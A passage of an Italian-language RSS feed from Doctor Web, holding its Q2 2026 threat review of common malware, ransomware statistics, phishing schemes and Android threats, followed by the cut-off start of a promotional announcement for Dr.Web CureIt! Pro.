        &lt;li&gt;I trojan bancari &lt;b&gt;Android.Banker&lt;/b&gt; rimangono i programmi malevoli per dispositivi Android più diffusi.&lt;/li&gt;
        &lt;li&gt;Gli specialisti Doctor Web rilevano un trojan pubblicitario, &lt;b&gt;Android.MagicAd.1&lt;/b&gt;, che è capace di aggirare le restrizioni di SO Android e visualizzare annunci dalla modalità background.&lt;/li&gt;
        &lt;li&gt;Gli attori di minacce distribuiscono il programma malevolo JobStealer, progettato per rubare dati riservati agli utenti dei computer Mac e Windows.&lt;/li&gt;
        &lt;li&gt;In uno degli aggiornamenti di Microsoft Visual Studio Code è rilevato codice malevolo.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse di II trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Adware.Downware.20091&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Software pubblicitario utilizzato come installer intermedio di programmi pirata.&lt;/dd&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;Trojan scritto nel linguaggio di programmazione Go e studiato per caricare nel sistema di destinazione vari cryptominer e software pubblicitari. Il programma malevolo è un file DLL e si trova in &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Per avviarsi, sfrutta la vulnerabilità di classe DLL Search Order Hijacking nel client torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un componente malevolo di un'estensione browser WinSafe. Questo componente rappresenta uno script JavaScript che visualizza pubblicità invadenti nei browser.&lt;/dd&gt;
    &lt;dt&gt;Trojan.Starter.8319&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di script XML malevoli che avviano il trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; e i suoi componenti.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Statistiche delle applicazioni malevole nel traffico email&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse nel traffico email di II trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;X97M.DownLoader.2343&lt;/dt&gt;
    &lt;dd&gt;File XLSX (formato di fogli di calcolo Microsoft Excel) con un oggetto OLE che scarica un file malevolo sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Exploit per l'utilizzo di vulnerabilità nel software Microsoft Office, che consentono di eseguire codice arbitrario.&lt;/dd&gt;
    &lt;dt&gt;JS.Muldrop.1171&lt;/dt&gt;
    &lt;dd&gt;Script malevolo in formato JavaScript, che avvia il malware in esso nascosto nel sistema target.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Ransomware di criptazione&lt;/h3&gt;

&lt;p&gt;Rispetto al I trimestre 2026, nel II trimestre il numero di richieste di decriptazione dei file colpiti dai trojan ransomware di criptazione è leggermente diminuito — del 2,67%.&lt;/p&gt;

&lt;p&gt;Dinamica del numero di richieste di decriptazione pervenute al Servizio di supporto tecnico Doctor Web:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Ransomware di criptazione più diffusi di II trimestre 2026&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 14,47% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 5,26% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.37400&lt;/b&gt; — 3,95% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.35209&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3,29% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44197&lt;/b&gt; — 2,63% di richieste utente&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Frode online&lt;/h3&gt;

&lt;p&gt;Una delle tendenze osservate dagli analisti internet di Doctor Web nel II trimestre 2026 è stata la cresciuta attività degli attacchi dei malintenzionati agli utenti del servizio di messaggistica istantanea russo MAX a fronte della crescita del suo pubblico. I malintenzionati utilizzano schemi noti che in precedenza erano orientati agli utenti di altri servizi di messaggistica istantanea, come Telegram e WhatsApp. Ad esempio, i nostri specialisti hanno rilevato numerosi siti fraudolenti creati allo scopo di rubare account MAX utilizzando il pretesto di svariate votazioni. La potenziale vittima viene invitata a votare in un determinato concorso, ma per fare questo, deve entrare nel proprio account fornendo il numero di cellulare e il codice di verifica arrivato dopo il suo inserimento. Quando l'utente inserisce tutti i dati, gli attaccanti ottengono l'accesso al suo account.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di uno dei siti di phishing tramite il quale i truffatori ottengono l'accesso all'account dell'app di messaggistica MAX della vittima&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Durante il II trimestre, gli analisti internet di Doctor Web segnalavano la comparsa di ulteriori siti fraudolenti relativi a investimenti. I cybercriminali seguono le moderne tendenze e continuano a sfruttare attivamente la tematica dell'intelligenza artificiale. Ad esempio, su alcune risorse internet loro invitavano le potenziali vittime ad aderire a un nuovo progetto di investimento, presumibilmente legato a maggiori istituti di credito russi. I malintenzionati promettevano l'accesso a un chatbot specializzato basato sull'AI ChatGPT, che fornirebbe l'assistenza negli investimenti. Per diventare partecipanti al "progetto", i visitatori del sito dovevano registrarsi indicando le proprie informazioni personali.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito fraudolento che suggerisce di registrarsi in un progetto di investimento, presumibilmente legato a una banca russa, e ottenere l'accesso a un chatbot finanziario specializzato basato su AI ChatGPT&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Allo stesso tempo, i truffatori cercavano di attirare gli utenti di lingua russa non solo con i nomi delle banche russe, ma anche con quelli di istituti creditizi di altri paesi. Ad esempio, i cybercriminali presentavano una serie di siti web di pseudo investimento come servizi legati a banche sudcoreane.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno dei siti fraudolenti che invitava gli utenti di lingua russa ad aderire a un certo progetto di investimento di una delle banche sudcoreane e prometteva un reddito a partire da 2.000.000 won sudcoreani&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nel II trimestre continuavano ad essere attivi i truffatori che cercavano di rubare dati di account di vari servizi. Tra i numerosi siti di phishing c'erano false risorse internet di compagnie di trasporto. Una delle risorse era mirata ai clienti di uno dei servizi di consegna espressa russi. Alle potenziali vittime veniva suggerito di entrare nel proprio account in base al numero di cellulare legato all'account, o autenticarsi tramite il servizio web statale russo Gosuslugi. In particolare, dopo "l'accesso" all'account nel primo modo, il sito visualizzava comunque il secondo modulo di phishing con il pretesto di autenticazione tramite il servizio web Gosuslugi.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Tramite un sito fraudolento, i malintenzionati potevano rubare le credenziali di più account alla volta: dell'area personale della compagnia di trasporto e del portale web Gosuslugi&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I nostri esperti hanno individuato, inoltre, nuovi siti web di phishing di istituti creditizi di diversi paesi. Così, ai depositanti di una delle banche statunitensi i truffatori suggerivano di entrare nell'account e controllare la disponibilità di un tasso di interesse aumentato per i "clienti fedeli":&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In un altro caso, il sito di phishing imitava l'aspetto esteriore di una delle banche di Ecuador e chiedeva agli utenti le credenziali dell'account di home banking:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Un altro schema di phishing era orientato agli utenti britannici. I cybercriminali creavano falsi siti di servizi pubblici, dove suggerivano di pagare una multa per parcheggio irregolare.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Alle potenziali vittime venivano chieste informazioni personali dettagliate — presumibilmente per l'identificazione, dopodiché gli utenti venivano reindirizzati alla pagina di pagamento della "multa".&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Uno dei popolari schemi fraudolenti rimane quello di suggerire l'ottenimento di vari bonus spettanti ai cittadini. I cybercriminali lo adattano però costantemente agli eventi attuali. Così, in previsione della Giornata della Russia, comparivano falsi siti di istituti di credito russi, su cui i malintenzionati promettevano ai visitatori pagamenti in occasione della festa. Su uno dei siti, agli utenti presumibilmente spetterebbero per la partecipazione a un sondaggio da 5.000 a 300.000 rubli russi:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In un'altra variante dello schema, gli utenti, dopo aver partecipato a un sondaggio, presumibilmente potrebbero aspettarsi di ricevere un "sussidio" di 5.000 rubli russi:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Mentre sullo sfondo delle notizie speculative sulla carenza di carburante in alcune regioni russe, una serie di siti truffa prometteva buoni per ricevere gratis da 20 a 100 litri di benzina:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Dopo che i visitatori di questi siti rispondevano ad alcune semplici domande, per ottenere il premio promesso, veniva suggerito loro di effettuare "l'identificazione". Per fare ciò, dovevano indicare il nome e cognome, il numero di cellulare, nonché il numero della carta bancaria. In seguito, i malintenzionati erano in grado di utilizzare queste informazioni per rubare denaro alle vittime.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Tra i siti indesiderati rilevati nel II trimestre si riscontavano anche falsi portali internet di Federazione internazionale di calcio FIFA, sui quali gli utenti presumibilmente potrebbero acquistare ufficialmente biglietti per le partite del Campionato mondiale di calcio del 2026, articoli regalo di marca, nonché vari servizi premium. Similmente al sito vero, agli utenti di queste falsificazioni veniva suggerito di accedere all'account FIFA ID, tuttavia, il modulo di inserimento di login e password in questo caso accettava qualsiasi dato.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso modulo di accesso all'account FIFA ID&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dopo che gli appassionati di calcio selezionavano una merce a cui erano interessati, veniva suggerito loro di formalizzare l'acquisto ed effettuare il pagamento. Durante il processo di pagamento, gli utenti giungevano al sito di un servizio che è presente nel database delle risorse internet non raccomandati dall'antivirus Dr.Web.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso sito di Federazione internazionale di calcio che presumibilmente consentirebbe di acquistare ufficialmente prodotti e servizi in licenza&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I nostri esperti hanno inoltre registrato una serie di campagne di spam studiate per distribuire link di falsi siti di marketplace russi, dove i malintenzionati invitavano le potenziali vittime a partecipare a "un'estrazione a premi correlata all'anniversario". I truffatori promettevano la possibilità di ottenere sia premi in denaro — fino a 1.000.000 di rubli russi, che apparecchiature informatiche e dispositivi mobili:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Per partecipare alla "promozione", gli utenti dovevano cliccare sul pulsante corrispondente su tali siti, dopodiché su di essi veniva simulata un'estrazione a premi. Dopo diversi tentativi, la potenziale vittima vedeva in una notifica che avesse vinto più regali, e che presumibilmente avesse la possibilità di scegliere se ricevere i premi stessi in un punto di ritiro del marketplace, o l'equivalente in denaro tramite bonifico al conto bancario:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Per partecipare alla "promozione", gli utenti dovevano cliccare sul pulsante corrispondente su tali siti, dopodiché su di essi veniva simulata un'estrazione a premi. Dopo diversi tentativi, la potenziale vittima vedeva in una notifica che avesse vinto più regali, e che presumibilmente avesse la possibilità di scegliere se ricevere i premi stessi in un punto di ritiro del marketplace, o l'equivalente in denaro tramite bonifico al conto bancario:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt; Dopo l'inserimento, i siti richiedevano il pagamento di una tassa statale — per la "formalizzazione ufficiale della vincita":&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In realtà, le vittime dei truffatori non ricevevano alcun premio. Non solo trasferivano ai malintenzionati i dati delle proprie carte bancarie, ma anche donavano loro i propri soldi.&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb-av.it/dangerous_urls/"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h3&gt;

&lt;p&gt;Secondo i dati delle statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel II trimestre 2026 gli utenti riscontavano meno spesso i trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, tuttavia, queste applicazioni trojan sono ancora il malware più diffuso. Inoltre, si osservava un altro calo dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;I programmi potenzialmente pericolosi più frequentemente rilevati nel II trimestre sono state le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Tool.NPMod&amp;lng=it"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;, che sono modificate tramite l'utility per il modding NP Manager. Gli attori di minacce utilizzano questo strumento per la protezione dei software malevoli dal rilevamento dagli antivirus. I programmi indesiderati più diffusi sono stati i falsi antivirus &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;. Per "risolvere" le presunte minacce trovate, richiedono di acquistare una versione completa.&lt;/p&gt;

&lt;p&gt;I più attivi software pubblicitari sono stati i moduli &lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, che visualizzano notifiche fuorvianti e raccolgono dati riservati. Si sono diffuse di nuovo le applicazioni di ottimizzazione del funzionamento del SO Android &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Creano notifiche di presunti memoria operativa insufficiente ed errori di sistema al fine di visualizzare la pubblicità durante "l'ottimizzazione". Rimanevano altamente attivi anche i programmi pubblicitari &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. I malintenzionati li distribuiscono con il pretesto di programmi di cheat, tramite i quali gli utenti presumibilmente potrebbero ottenere varie risorse all'interno di un gioco. In realtà, questi programmi solo caricano siti con annunci pubblicitari.&lt;/p&gt;

&lt;p&gt;A giugno gli specialisti dell'azienda Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15262" target="_blank"&gt;hanno avvertito&lt;/a&gt; del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, che è capace di aggirare le restrizioni del sistema operativo Android e visualizzare la pubblicità in background. &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; utilizza a questo scopo applicazioni di terze parti, nonché una serie di tecniche che esso seleziona a seconda del produttore del dispositivo target.&lt;/p&gt;

&lt;p&gt;Durante il II trimestre i nostri analisti dei virus hanno rilevato sullo store di app Google Play ulteriori programmi trojan delle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, che iscrivono gli utenti a servizi a pagamento. In totale, sono stati scaricati almeno 2.600.000 volte.&lt;/p&gt;

&lt;p&gt;Eventi più importanti relativi alla sicurezza "mobile" in II trimestre&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;I trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; continuano ad essere leader per il numero di rilevamenti di malware sui dispositivi protetti tramite Dr.Web.&lt;/li&gt;
    &lt;li&gt;I malintenzionati continuano a impiegare attivamente gli strumenti specializzati per il modding di programmi Android allo scopo di proteggere i trojan bancari dal rilevamento tramite antivirus.&lt;/li&gt;
    &lt;li&gt;Diminuisce di nuovo l'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
    &lt;li&gt;Gli analisti dei virus Doctor Web individuano &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, un trojan che sfrutta programmi di terze parti per aggirare le restrizioni di SO Android e visualizzare pubblicità in background.&lt;/li&gt;
    &lt;li&gt;Sullo store di app Google Play sono rilevate nuove applicazioni trojan che iscrivono utenti a servizi a pagamento.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel II trimestre 2026 leggete la nostra &lt;a href="https://news.drweb-av.it/show/review/?lng=it&amp;i=15274" target="_blank"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15266&amp;lng=it</guid><title>Finalmente è qui! Dr.Web CureIt! Pro è rilasciata ed è disponibile gratis per tutti</title><link>https://news.drweb-av.it/show/?i=15266&amp;lng=it&amp;c=5</link><pubDate>Tue, 23 Jun 2026 12:08:24 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Ecco a voi Dr.Web CureIt! Pro — versione estesa dell'utility di cura diventata un punto di riferimento. È già operativa, e proprio adesso potete ottenerne l'accesso promozionale completamente gratis.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Come ottenere Dr.Web CureIt! Pro gratis&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Per i nuovi utenti. &lt;/strong&gt;Andate al sito &lt;a href="https://free.drweb-av.it/download+cureit+free/?lng=it"&gt;free.drweb-av.it.&lt;/a&gt; Compilate il modulo standard per l'ottenimento del Dr.Web CureIt! regolare, e ricevete il link per il download di Dr.Web CureIt! Pro con una licenza per 1 giorno. Nessun pagamento nascosto — basta compilare il modulo e potete curare il proprio computer utilizzando le impostazioni estese.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Per gli utenti attuali della versione a pagamento di Dr.Web CureIt!.&lt;/strong&gt; Entrate nella propria Area personale, in essa è disponibile per il download il pacchetto di Dr.Web CureIt! Pro. Scaricate e utilizzate senza limitazioni durante tutto il periodo di validità della vostra licenza.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Vi ricordiamo che la versione Pro fornisce impostazioni flessibili di scansione, la gestione delle eccezioni, l'assegnazione manuale delle azioni per le minacce e statistiche estese.&lt;/p&gt;&lt;p&gt;Prestate attenzione! L'accesso promozionale gratuito per 1 giorno tramite il sito &lt;a href="https://free.drweb-av.it/download+cureit+free/?lng=it"&gt;free.drweb-av.it&lt;/a&gt; è un'offerta speciale che permette di valutare tutti i vantaggi della versione Pro senza pagare. L'offerta è valida fino al 30 giugno 2026 incluso.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;A partire dal 1 luglio 2026 saranno 